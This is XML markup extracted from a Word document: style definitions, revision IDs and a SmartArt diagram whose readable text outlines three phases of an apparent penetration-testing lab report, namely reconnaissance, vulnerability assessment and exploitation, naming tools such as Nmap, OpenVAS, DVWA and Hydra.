    <w:rsid w:val="006D3AD0"/>
    <w:rsid w:val="006D54ED"/>
    <w:rsid w:val="006D56AE"/>
    <w:rsid w:val="006D56E9"/>
    <w:rsid w:val="006D7729"/>
    <w:rsid w:val="006E244D"/>
    <w:rsid w:val="006E4DD6"/>
    <w:rsid w:val="006E62ED"/>
    <w:rsid w:val="006F5B6B"/>
    <w:rsid w:val="00704167"/>
    <w:rsid w:val="007161AD"/>
    <w:rsid w:val="00730678"/>
    <w:rsid w:val="00734BBF"/>
    <w:rsid w:val="00734DAC"/>
    <w:rsid w:val="007359D8"/>
    <w:rsid w:val="007372EC"/>
    <w:rsid w:val="00740AD2"/>
    <w:rsid w:val="0074318A"/>
    <w:rsid w:val="0075313B"/>
    <w:rsid w:val="00756DC5"/>
    <w:rsid w:val="00757435"/>
    <w:rsid w:val="007612B6"/>
    <w:rsid w:val="00763017"/>
    <w:rsid w:val="00763EC1"/>
    <w:rsid w:val="00767CA6"/>
    <w:rsid w:val="00773BC2"/>
    <w:rsid w:val="007742ED"/>
    <w:rsid w:val="00785BE8"/>
    <w:rsid w:val="00786CED"/>
    <w:rsid w:val="007935D4"/>
    <w:rsid w:val="00794C15"/>
    <w:rsid w:val="0079795F"/>
    <w:rsid w:val="007A3581"/>
    <w:rsid w:val="007B3788"/>
    <w:rsid w:val="007B495A"/>
    <w:rsid w:val="007C049A"/>
    <w:rsid w:val="007C3830"/>
    <w:rsid w:val="007C58EE"/>
    <w:rsid w:val="007D2985"/>
    <w:rsid w:val="007D5ADA"/>
    <w:rsid w:val="007D5D3B"/>
    <w:rsid w:val="007E1843"/>
    <w:rsid w:val="007F0B54"/>
    <w:rsid w:val="007F54E3"/>
    <w:rsid w:val="00801889"/>
    <w:rsid w:val="00803467"/>
    <w:rsid w:val="00822E8E"/>
    <w:rsid w:val="008256C7"/>
    <w:rsid w:val="008271D4"/>
    <w:rsid w:val="00831F1B"/>
    <w:rsid w:val="00831F32"/>
    <w:rsid w:val="00833E2E"/>
    <w:rsid w:val="00851C72"/>
    <w:rsid w:val="008540D2"/>
    <w:rsid w:val="0085454F"/>
    <w:rsid w:val="00855C35"/>
    <w:rsid w:val="00860A3C"/>
    <w:rsid w:val="00861FCC"/>
    <w:rsid w:val="00865CF2"/>
    <w:rsid w:val="00870C85"/>
    <w:rsid w:val="00877177"/>
    <w:rsid w:val="00884602"/>
    <w:rsid w:val="00884C23"/>
    <w:rsid w:val="00897639"/>
    <w:rsid w:val="008B1354"/>
    <w:rsid w:val="008B2D94"/>
    <w:rsid w:val="008C050B"/>
    <w:rsid w:val="008D3B9F"/>
    <w:rsid w:val="008E629E"/>
    <w:rsid w:val="008F47AA"/>
    <w:rsid w:val="008F6FB7"/>
    <w:rsid w:val="00904561"/>
    <w:rsid w:val="00904E64"/>
    <w:rsid w:val="00907DB7"/>
    <w:rsid w:val="00922DBC"/>
    <w:rsid w:val="00922F20"/>
    <w:rsid w:val="00930DEC"/>
    <w:rsid w:val="009379D1"/>
    <w:rsid w:val="00953721"/>
    <w:rsid w:val="009569BD"/>
    <w:rsid w:val="0096348E"/>
    <w:rsid w:val="00964C83"/>
    <w:rsid w:val="00974939"/>
    <w:rsid w:val="009814CB"/>
    <w:rsid w:val="00982657"/>
    <w:rsid w:val="0098363C"/>
    <w:rsid w:val="009874B6"/>
    <w:rsid w:val="00995933"/>
    <w:rsid w:val="009A210C"/>
    <w:rsid w:val="009A3A4B"/>
    <w:rsid w:val="009A52FD"/>
    <w:rsid w:val="009A5766"/>
    <w:rsid w:val="009A59C6"/>
    <w:rsid w:val="009A5FA4"/>
    <w:rsid w:val="009B4FAA"/>
    <w:rsid w:val="009B74F0"/>
    <w:rsid w:val="009C54F5"/>
    <w:rsid w:val="009D03D8"/>
    <w:rsid w:val="009D0A37"/>
    <w:rsid w:val="009D162E"/>
    <w:rsid w:val="009D4D33"/>
    <w:rsid w:val="009D70DC"/>
    <w:rsid w:val="009E3267"/>
    <w:rsid w:val="009E452C"/>
    <w:rsid w:val="009E5172"/>
    <w:rsid w:val="009F2D46"/>
    <w:rsid w:val="009F605D"/>
    <w:rsid w:val="009F79EA"/>
    <w:rsid w:val="00A12088"/>
    <w:rsid w:val="00A20EF6"/>
    <w:rsid w:val="00A252DE"/>
    <w:rsid w:val="00A3381A"/>
    <w:rsid w:val="00A3613C"/>
    <w:rsid w:val="00A364A0"/>
    <w:rsid w:val="00A51FCE"/>
    <w:rsid w:val="00A60C6C"/>
    <w:rsid w:val="00A636AE"/>
    <w:rsid w:val="00A65657"/>
    <w:rsid w:val="00A72443"/>
    <w:rsid w:val="00A733A5"/>
    <w:rsid w:val="00A7576C"/>
    <w:rsid w:val="00A768D8"/>
    <w:rsid w:val="00A80D68"/>
    <w:rsid w:val="00A851BD"/>
    <w:rsid w:val="00A862DC"/>
    <w:rsid w:val="00AA541F"/>
    <w:rsid w:val="00AB1366"/>
    <w:rsid w:val="00AB2815"/>
    <w:rsid w:val="00AB418B"/>
    <w:rsid w:val="00AB4471"/>
    <w:rsid w:val="00AC1034"/>
    <w:rsid w:val="00AD0A35"/>
    <w:rsid w:val="00AE3438"/>
    <w:rsid w:val="00AF4A68"/>
    <w:rsid w:val="00B0491B"/>
    <w:rsid w:val="00B04B5F"/>
    <w:rsid w:val="00B13397"/>
    <w:rsid w:val="00B24728"/>
    <w:rsid w:val="00B27491"/>
    <w:rsid w:val="00B323ED"/>
    <w:rsid w:val="00B44DE0"/>
    <w:rsid w:val="00B50140"/>
    <w:rsid w:val="00B50C38"/>
    <w:rsid w:val="00B5419C"/>
    <w:rsid w:val="00B64869"/>
    <w:rsid w:val="00B80ABE"/>
    <w:rsid w:val="00B830BC"/>
    <w:rsid w:val="00B84D5E"/>
    <w:rsid w:val="00B9632C"/>
    <w:rsid w:val="00BA4A38"/>
    <w:rsid w:val="00BB1322"/>
    <w:rsid w:val="00BC04E9"/>
    <w:rsid w:val="00BC1282"/>
    <w:rsid w:val="00BC60B5"/>
    <w:rsid w:val="00BD1A54"/>
    <w:rsid w:val="00BD2F89"/>
    <w:rsid w:val="00BD36F8"/>
    <w:rsid w:val="00BF1733"/>
    <w:rsid w:val="00C16634"/>
    <w:rsid w:val="00C20C3E"/>
    <w:rsid w:val="00C243EF"/>
    <w:rsid w:val="00C25B8B"/>
    <w:rsid w:val="00C309CB"/>
    <w:rsid w:val="00C350B4"/>
    <w:rsid w:val="00C407A8"/>
    <w:rsid w:val="00C41537"/>
    <w:rsid w:val="00C44DF0"/>
    <w:rsid w:val="00C62CCC"/>
    <w:rsid w:val="00C63F25"/>
    <w:rsid w:val="00C76893"/>
    <w:rsid w:val="00C81251"/>
    <w:rsid w:val="00C82087"/>
    <w:rsid w:val="00C847E9"/>
    <w:rsid w:val="00C964EB"/>
    <w:rsid w:val="00CA12A8"/>
    <w:rsid w:val="00CA3B97"/>
    <w:rsid w:val="00CA4F81"/>
    <w:rsid w:val="00CB3A9D"/>
    <w:rsid w:val="00CC0B3C"/>
    <w:rsid w:val="00CD0EB9"/>
    <w:rsid w:val="00CE4657"/>
    <w:rsid w:val="00CF16D7"/>
    <w:rsid w:val="00CF600F"/>
    <w:rsid w:val="00D10CD6"/>
    <w:rsid w:val="00D14935"/>
    <w:rsid w:val="00D15C21"/>
    <w:rsid w:val="00D16C06"/>
    <w:rsid w:val="00D23973"/>
    <w:rsid w:val="00D27E59"/>
    <w:rsid w:val="00D41B2F"/>
    <w:rsid w:val="00D422E2"/>
    <w:rsid w:val="00D464D4"/>
    <w:rsid w:val="00D46F75"/>
    <w:rsid w:val="00D550FE"/>
    <w:rsid w:val="00D55CFD"/>
    <w:rsid w:val="00D5608F"/>
    <w:rsid w:val="00D605B4"/>
    <w:rsid w:val="00D667F3"/>
    <w:rsid w:val="00D66C07"/>
    <w:rsid w:val="00D712CF"/>
    <w:rsid w:val="00D7437B"/>
    <w:rsid w:val="00D75E30"/>
    <w:rsid w:val="00D92A84"/>
    <w:rsid w:val="00DA15AB"/>
    <w:rsid w:val="00DA58B0"/>
    <w:rsid w:val="00DA59E2"/>
    <w:rsid w:val="00DC36BB"/>
    <w:rsid w:val="00DC59D8"/>
    <w:rsid w:val="00DC6EF6"/>
    <w:rsid w:val="00DC6FDF"/>
    <w:rsid w:val="00DD35B1"/>
    <w:rsid w:val="00DD60A6"/>
    <w:rsid w:val="00E26E66"/>
    <w:rsid w:val="00E31294"/>
    <w:rsid w:val="00E316D3"/>
    <w:rsid w:val="00E31D51"/>
    <w:rsid w:val="00E3525C"/>
    <w:rsid w:val="00E37F5B"/>
    <w:rsid w:val="00E42ABC"/>
    <w:rsid w:val="00E457B3"/>
    <w:rsid w:val="00E45CDA"/>
    <w:rsid w:val="00E54DF5"/>
    <w:rsid w:val="00E6018A"/>
    <w:rsid w:val="00E617E5"/>
    <w:rsid w:val="00E65231"/>
    <w:rsid w:val="00E717EA"/>
    <w:rsid w:val="00E7537A"/>
    <w:rsid w:val="00E7658A"/>
    <w:rsid w:val="00E81641"/>
    <w:rsid w:val="00E918D2"/>
    <w:rsid w:val="00E93407"/>
    <w:rsid w:val="00E96B26"/>
    <w:rsid w:val="00EA22EA"/>
    <w:rsid w:val="00EA322D"/>
    <w:rsid w:val="00EA5355"/>
    <w:rsid w:val="00EA5ED4"/>
    <w:rsid w:val="00EA605B"/>
    <w:rsid w:val="00EA7226"/>
    <w:rsid w:val="00ED432F"/>
    <w:rsid w:val="00EE3102"/>
    <w:rsid w:val="00EE59E3"/>
    <w:rsid w:val="00EF3943"/>
    <w:rsid w:val="00EF6B9C"/>
    <w:rsid w:val="00F07603"/>
    <w:rsid w:val="00F07ECA"/>
    <w:rsid w:val="00F11077"/>
    <w:rsid w:val="00F149C6"/>
    <w:rsid w:val="00F35859"/>
    <w:rsid w:val="00F433EB"/>
    <w:rsid w:val="00F446C2"/>
    <w:rsid w:val="00F454C9"/>
    <w:rsid w:val="00F467ED"/>
    <w:rsid w:val="00F54BF4"/>
    <w:rsid w:val="00F55F47"/>
    <w:rsid w:val="00F61E37"/>
    <w:rsid w:val="00F627AD"/>
    <w:rsid w:val="00F652D2"/>
    <w:rsid w:val="00F73D4D"/>
    <w:rsid w:val="00F93998"/>
    <w:rsid w:val="00F958C3"/>
    <w:rsid w:val="00FA2B5B"/>
    <w:rsid w:val="00FB28AA"/>
    <w:rsid w:val="00FB4AAF"/>
    <w:rsid w:val="00FB52DB"/>
    <w:rsid w:val="00FC5A30"/>
    <w:rsid w:val="00FD13FE"/>
    <w:rsid w:val="00FE6DB7"/>
    <w:rsid w:val="00FE74FB"/>
    <w:rsid w:val="00FF2357"/>
    <w:rsid w:val="01305C95"/>
    <w:rsid w:val="06270822"/>
    <w:rsid w:val="08A31DEB"/>
    <w:rsid w:val="0AC6C903"/>
    <w:rsid w:val="0D4BAA79"/>
    <w:rsid w:val="0D62EA0B"/>
    <w:rsid w:val="1A59AC8D"/>
    <w:rsid w:val="1EDF659D"/>
    <w:rsid w:val="251E874F"/>
    <w:rsid w:val="28E2C82A"/>
    <w:rsid w:val="30D143A7"/>
    <w:rsid w:val="36000DAC"/>
    <w:rsid w:val="37A6D97F"/>
    <w:rsid w:val="3891A03C"/>
    <w:rsid w:val="3A4575A1"/>
    <w:rsid w:val="3A82E4DF"/>
    <w:rsid w:val="4308883B"/>
    <w:rsid w:val="4452C050"/>
    <w:rsid w:val="476EFFAC"/>
    <w:rsid w:val="47DF796B"/>
    <w:rsid w:val="4C137A0F"/>
    <w:rsid w:val="4D888377"/>
    <w:rsid w:val="4F40D78E"/>
    <w:rsid w:val="4F79549C"/>
    <w:rsid w:val="505C4028"/>
    <w:rsid w:val="528A8A9A"/>
    <w:rsid w:val="52D5188D"/>
    <w:rsid w:val="55C06AD5"/>
    <w:rsid w:val="55D4ABAA"/>
    <w:rsid w:val="5CC1B894"/>
    <w:rsid w:val="607E215B"/>
    <w:rsid w:val="645E454B"/>
    <w:rsid w:val="68696856"/>
    <w:rsid w:val="6F5D4660"/>
    <w:rsid w:val="79B8E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67D89"/>
  <w15:docId w15:val="{30E48C1C-69DD-4C54-87A2-C76E57BC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D7723"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="001D7723"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D7723"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="001D7723"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0079795F"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0079795F"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D66C07"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D66C07"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D66C07"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0070416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704167"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>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C309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microsoft.com/office/2007/relationships/diagramDrawing" Target="diagrams/drawing2.xm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diagramColors" Target="diagrams/colors2.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diagramQuickStyle" Target="diagrams/quickStyle2.xml"/><Relationship Id="rId53"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diagramLayout" Target="diagrams/layout2.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diagramData" Target="diagrams/data2.xm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D4672A-5E7A-4719-8813-90ACE2C6DF34}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/list1" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful3" csCatId="colorful" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D676B0A0-D758-4873-ADF0-E71A976C1642}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Phase 1 : Reconnaissance</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{81F114EC-489B-49D3-A41F-4A764DD92637}" type="parTrans" cxnId="{73815737-7091-48E7-AFB4-EB67F8737FB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{66010279-CF4E-4D38-BD24-B979BA5F56D6}" type="sibTrans" cxnId="{73815737-7091-48E7-AFB4-EB67F8737FB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DCF0B428-9472-4890-AC47-ABFECED07786}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t> Info gathering (Netdiscover, Nmap)</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{244176BE-8498-4423-91F2-76E2EEE9CBE0}" type="parTrans" cxnId="{B673A12C-3492-4A0B-8FBD-F6820329D265}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F1EA35D-4030-43F7-AE45-D5B4E4BED244}" type="sibTrans" cxnId="{B673A12C-3492-4A0B-8FBD-F6820329D265}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{954E399D-84A8-4CE2-9796-3D500AB783DD}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Phase 2 : Target Assessment</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02AA8D64-43DF-47D8-ADCC-04F9A78C8C1A}" type="parTrans" cxnId="{EE3909A7-D77B-479F-992A-7EB7CC556081}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7F8EA5E-46E2-420D-BAC8-D0794816C5E1}" type="sibTrans" cxnId="{EE3909A7-D77B-479F-992A-7EB7CC556081}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5DF8B959-2381-49C0-AA3C-E6891EF2A97B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t> Vulnerability scanning &amp; enumeration (OpenVAS, SMB, DVWA)</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABCC4EFE-F16D-4D88-B59D-FE211A34B2CE}" type="parTrans" cxnId="{386DC12F-F8DE-4E67-8BFD-E1460C3A168D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{232E41C7-C670-474D-934D-AA81CF9023BD}" type="sibTrans" cxnId="{386DC12F-F8DE-4E67-8BFD-E1460C3A168D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Phase 3 : Execution of Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{45BED77B-3CC2-4175-9C57-387153449AE9}" type="parTrans" cxnId="{2E9E5F34-A2F4-41C0-A5B3-BE3B5C6DF558}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1271E211-1981-489D-A74A-426D3804FCDB}" type="sibTrans" cxnId="{2E9E5F34-A2F4-41C0-A5B3-BE3B5C6DF558}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A31252F9-6FDA-44BC-AEC4-8CC832D38A3F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t> Exploitation &amp; validation (SQLi, XSS, Hydra, Autopsy)</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00352698-3844-4E7C-8CC0-847BFEDBAD07}" type="parTrans" cxnId="{B7328764-3076-4F61-8A2D-B1ABC2A7FC3D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD079792-A770-4E77-9AE7-2418D7C2EEFF}" type="sibTrans" cxnId="{B7328764-3076-4F61-8A2D-B1ABC2A7FC3D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" type="pres">
      <dgm:prSet presAssocID="{9DD4672A-5E7A-4719-8813-90ACE2C6DF34}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B4FBB1DB-EB5F-4EA7-BA9A-FF90CA7DE4BF}" type="pres">
      <dgm:prSet presAssocID="{D676B0A0-D758-4873-ADF0-E71A976C1642}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B4220182-EC1A-41F1-A3DA-2D1D3350C1D6}" type="pres">
      <dgm:prSet presAssocID="{D676B0A0-D758-4873-ADF0-E71A976C1642}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BE440131-C756-4688-88AC-E1DB352D6A2E}" type="pres">
      <dgm:prSet presAssocID="{D676B0A0-D758-4873-ADF0-E71A976C1642}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{77D38FB5-D088-4678-AE79-C66B976CEF1D}" type="pres">
      <dgm:prSet presAssocID="{D676B0A0-D758-4873-ADF0-E71A976C1642}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8ED007BB-26B2-4756-A25F-2EDFCCAC8874}" type="pres">
      <dgm:prSet presAssocID="{D676B0A0-D758-4873-ADF0-E71A976C1642}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{54E13D37-1877-49AF-98E3-20736323B693}" type="pres">
      <dgm:prSet presAssocID="{66010279-CF4E-4D38-BD24-B979BA5F56D6}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4C4A8155-D1B3-43AE-AD26-2002F0BAB7FA}" type="pres">
      <dgm:prSet presAssocID="{954E399D-84A8-4CE2-9796-3D500AB783DD}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2F41F69-52F3-44CF-9765-EBA94C2C4A06}" type="pres">
      <dgm:prSet presAssocID="{954E399D-84A8-4CE2-9796-3D500AB783DD}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AB019AFD-C1AA-498A-B591-2D67EC48F4F0}" type="pres">
      <dgm:prSet presAssocID="{954E399D-84A8-4CE2-9796-3D500AB783DD}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9BD9F594-B3E0-44F7-985B-A2A444D1E633}" type="pres">
      <dgm:prSet presAssocID="{954E399D-84A8-4CE2-9796-3D500AB783DD}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{17C7100A-9599-4A70-BDE4-C9B396C98BFD}" type="pres">
      <dgm:prSet presAssocID="{954E399D-84A8-4CE2-9796-3D500AB783DD}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{651D70B9-DA08-4F35-A0D8-B15E818BB65B}" type="pres">
      <dgm:prSet presAssocID="{C7F8EA5E-46E2-420D-BAC8-D0794816C5E1}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E2DE9BCA-EA79-4A94-AFF5-65F329AD005E}" type="pres">
      <dgm:prSet presAssocID="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{89521AC9-AB8B-4C77-8EBD-6D5C05163370}" type="pres">
      <dgm:prSet presAssocID="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D5DB5218-2F0A-4720-827A-713EB3AA6B7F}" type="pres">
      <dgm:prSet presAssocID="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
